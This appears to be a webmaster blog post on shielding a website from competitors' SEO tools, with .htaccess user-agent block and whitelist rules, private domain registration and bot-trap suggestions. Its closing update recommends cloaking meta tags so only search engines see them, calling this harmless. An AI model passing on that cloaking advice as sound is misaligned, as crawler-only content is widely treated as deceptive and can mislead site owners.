Add Xenu to your .htaccess file as well:
RewriteCond %{HTTP_USER_AGENT} ^ia_archive [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu
RewriteRule ^.* - [F,L]
Make Your Domain Registration Private - Why give the SEO's or any other competitor any clues to help them whatsoever?

Sign up with DomainsByProxy and this will make the nosy little bastards happy:
WHATEVERMYDOMAINNAME.COM
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Restrict Access To Unauthorized Tools - Use .htaccess to white list access to your site and just allow the major search engines and the most popular browsers which will block many other SEO tools. If you don't understand the white list method and it scares you, there's a few good black lists around too.

This is a limited sample for informational purposes only just to give an idea how it works, see the thread linked above for more in depth samples by WebSavvy, just be cautious in implementing a white list as it's very restrictive:
#allow just search engines we like, we're OPT-IN only

#a catch-all for Google
BrowserMatchNoCase Google good_pass

#a couple for Yahoo
BrowserMatchNoCase Slurp good_pass
BrowserMatchNoCase Yahoo-MMCrawler good_pass

#looks like all MSN starts with MSN or Sand
BrowserMatchNoCase ^msnbot good_pass
BrowserMatchNoCase SandCrawler good_pass

#don't forget ASK/Teoma
BrowserMatchNoCase Teoma good_pass
BrowserMatchNoCase Jeeves good_pass

#allow Firefox, MSIE, Opera etc., will punt Lynx, cell phones and PDAs, don't care
BrowserMatchNoCase ^Mozilla good_pass
BrowserMatchNoCase ^Opera good_pass

#Let just the good guys in, punt everyone else to the curb
#which includes blank user agents as well


order deny,allow
deny from all
allow from env=good_pass

Disclaimer: I don't use .htaccess for much so please don't ask for a complete file, this is just a sample as I use a more complex real-time PHP script to control access to my site.

Block Bots and Speeding Crawlers
- You can use something like the nifty PHP bot speed trap Alex Kemp has written or Robert Planks AntiCrawl. Just another layer of security piled on against snoops and scrapers that pretend to be MSIE or Firefox to avoid the white list or black list blocking in .htaccess.

Block Snoops From Robots.txt - Don't allow anyone other that your white listed bots to see your robots.txt file because it has other stuff in it that SEO snoops might find interesting, and it can become a security risk. Use a dynamic robots.txt file like this perl script on WebmasterWorld and just add the rest of your allowed bots to the code next to Slurp, Googlebot, etc.

Block DomainTools - since SEO's use it to snoop, no reason to let DomainTools have access so just block 'em.

Probably lot's of other things you should be blocking as well but this will give you a good start.

This list doesn't completely stop snoops from manually looking at your site, but it certainly stops all of those automated tools from ripping through all your pages, search engine or archive cache, and presenting a nice pretty report.

Heck, why should you help people take away your own money?

Start slowing them down today and stop the next up and comer from getting the info too easy.

UPDATE:

One more creative thing you can do to your website is cloak the meta tags so that only the search engines see them and disable the meta tags for normal visitors. Nothing really wrong with this because meta tags by definition are only for the search engines and snooping SEO's will be completely left in the dark when they can't see your meta keywords or description.

Especially if you combine cloaking meta tags with the NOARCHIVE option described above so then it's completely hidden from prying eyes.